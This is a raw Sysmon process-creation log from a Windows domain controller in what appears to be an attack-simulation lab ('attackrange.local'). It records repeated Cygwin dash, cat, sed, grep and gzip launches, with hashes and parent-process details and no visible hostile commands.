14:55:55.479{A8622C2F-53FB-6078-0A09-00000000AE01}5220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048506Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.471{A8622C2F-53FB-6078-0909-00000000AE01}3008C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-0809-00000000AE01}4568C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048495Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.462{A8622C2F-53FB-6078-0809-00000000AE01}4568C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048483Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.454{A8622C2F-53FB-6078-0709-00000000AE01}6808C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-0509-00000000AE01}1408C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048464Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.446{A8622C2F-53FB-6078-0509-00000000AE01}1408C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048463Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.446{A8622C2F-53FB-6078-0609-00000000AE01}5776C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-0309-00000000AE01}4412C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048445Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.439{A8622C2F-53FB-6078-0409-00000000AE01}5628C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-0209-00000000AE01}5640C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048443Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.439{A8622C2F-53FB-6078-0309-00000000AE01}4412C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048431Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.432{A8622C2F-53FB-6078-0209-00000000AE01}5640C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048419Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.424{A8622C2F-53FB-6078-0109-00000000AE01}6580C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-0009-00000000AE01}6884C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048409Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.417{A8622C2F-53FB-6078-0009-00000000AE01}6884C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048395Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.408{A8622C2F-53FB-6078-FF08-00000000AE01}3368C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-FD08-00000000AE01}5344C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048378Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.401{A8622C2F-53FB-6078-FE08-00000000AE01}5224C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-FB08-00000000AE01}1800C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048376Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.401{A8622C2F-53FB-6078-FD08-00000000AE01}5344C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048357Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.394{A8622C2F-53FB-6078-FC08-00000000AE01}5620C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-FA08-00000000AE01}5212C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048356Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.394{A8622C2F-53FB-6078-FB08-00000000AE01}1800C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048344Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.387{A8622C2F-53FB-6078-FA08-00000000AE01}5212C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048332Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.379{A8622C2F-53FB-6078-F908-00000000AE01}3300C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-F808-00000000AE01}6064C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048322Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.372{A8622C2F-53FB-6078-F808-00000000AE01}6064C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048310Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.363{A8622C2F-53FB-6078-F708-00000000AE01}1140C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-F608-00000000AE01}3136C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048292Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.355{A8622C2F-53FB-6078-F608-00000000AE01}3136C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048289Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.355{A8622C2F-53FB-6078-F508-00000000AE01}4424C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-F308-00000000AE01}6032C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048271Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.348{A8622C2F-53FB-6078-F408-00000000AE01}6440C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-F208-00000000AE01}4364C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048269Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.348{A8622C2F-53FB-6078-F308-00000000AE01}6032C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048257Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.341{A8622C2F-53FB-6078-F208-00000000AE01}4364C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048245Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.333{A8622C2F-53FB-6078-F108-00000000AE01}1392C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-F008-00000000AE01}1844C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048235Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.326{A8622C2F-53FB-6078-F008-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048222Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.317{A8622C2F-53FB-6078-EF08-00000000AE01}6968C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-ED08-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048203Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.310{A8622C2F-53FB-6078-EE08-00000000AE01}6592C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-EB08-00000000AE01}5516C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048202Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.310{A8622C2F-53FB-6078-ED08-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048184Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.302{A8622C2F-53FB-6078-EC08-00000000AE01}5864C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-EA08-00000000AE01}3368C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048182Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.302{A8622C2F-53FB-6078-EB08-00000000AE01}5516C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048170Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.295{A8622C2F-53FB-6078-EA08-00000000AE01}3368C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048158Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.287{A8622C2F-53FB-6078-E908-00000000AE01}6672C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-E808-00000000AE01}3220C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048147Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.280{A8622C2F-53FB-6078-E808-00000000AE01}3220C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048135Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.271{A8622C2F-53FB-6078-E708-00000000AE01}5212C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-E508-00000000AE01}5404C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048117Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.264{A8622C2F-53FB-6078-E608-00000000AE01}3300C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-E308-00000000AE01}5116C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048115Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.264{A8622C2F-53FB-6078-E508-00000000AE01}5404C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048096Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.257{A8622C2F-53FB-6078-E408-00000000AE01}1140C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-E208-00000000AE01}3008C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048095Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.257{A8622C2F-53FB-6078-E308-00000000AE01}5116C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048082Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 
14:55:55.249{A8622C2F-53FB-6078-E208-00000000AE01}3008C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048070Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.241{A8622C2F-53FB-6078-E108-00000000AE01}3208C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-E008-00000000AE01}4344C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000048060Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 